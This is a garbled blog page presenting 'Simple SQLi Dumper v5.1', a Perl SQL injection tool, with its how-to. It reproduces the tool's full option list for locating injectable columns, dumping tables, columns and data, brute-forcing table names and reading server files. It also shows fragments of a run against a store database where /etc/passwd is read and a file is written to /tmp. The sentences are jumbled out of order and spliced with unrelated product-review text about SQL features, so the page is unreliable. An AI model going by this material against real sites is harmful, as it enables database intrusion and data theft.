aspect_ratio(2) audio_format(3) category(7) customer(200) deposit(11) discount_group(9) discount_group_price(10) finding table now we use URL that include "c0li" string on it to find table & column. we can see the database information and operation system too. Our magic number is 1 and it will replace with "c0li" string. Database: 460store User: Version: 5.0.51a-log System: redhat-linux-gnu Access to "mysql" Database: No Read File "/etc/passwd": Yes (w00t) Create File "/tmp/c0li-430.txt": Yes (w00t) Done. noge]# perl -u -magic = | Simple SQLi Dumper v5.1 | | Coded by Vrs-hCk | = Help Command: -h, -help, -help URL: End Tag: -Attempting to find the magic nu mber. null column used for execute our SQL query. first of all we have to find null column (magic number). | -e sql injection end tag (default: "-") | | -d this option should not be used (default: | | -t table_name | | -c column_name (example: id,user,pass,email) | | -s SPACE code: +,/**/,%20 (default: "+") | | -f max field to get magic number (default: 123) | | -start row number to begin dumping data | | -stop row number to stop dumping | | -where your special dumping query | || | -info Get MySQL Information | | -dbase Concat Databases | | -table Concat Tables | | -column Concat Columns | | -tabcol Concat Tables with Columns | | -find Search Columns Name | | -magic Find Magic Number | | -dump Dump Data | | -brute Fuzzing Tables & Columns | || | -log file name to save ssdp data (default: ssdp.log) | | -p hostname:port | |-| noge]# perl -h |-|-| -| | Usage: perl | || | -u target with id parameter or sqli url with c0li string | SQL Injection - Operation System Function - Dump Database - Extract Database Schema - Search Columns Name - Read File (read only) - Create File (read only) - Brute Table & Column SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database. #SQLI DUMPER DOWNLOAD HOW TO#USE IT AT YOUR OWN RISK!! SSDp coded by Vrs-hCk ( anderantisecurityorg anderantisecurityorg ) SSDp How To by NoGe ( marioantisecurityorg marioantisecurityorg ) WE ARE NOT RESPONSIBLE OF ANY DAMAGE AND IMPROPERLY USE OF THIS TOOL. USE THIS TOOL FOR EDUCATION PURPOSE ONLY. Has special features that allows the user to have greater flexibility when working with SQL.SIMPLE SQLI DUMPER V5.1 Maby NoGe in Labels:vulnerabilities,linux,tutorial,mixed Labels:vulnerabilities,linux,tutorial,mixed tutorial 0 I would personally definitely recommend this product. Although it is somewhat costly, it will actually save your organization money in the long-term by freeing up extensive labor hours, as well as allowing for better decision making. It will make every process much more efficient and effective. This product is a necessity for anyone working with SQL in large quantities. This guarantees the Identity field value. Another special feature is the Primary Key Identity feature. For example, the Foreign Keys feature allows the user to set a specific order to the tables in the text file, that way future info can be inserted while avoiding collisions and errors.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |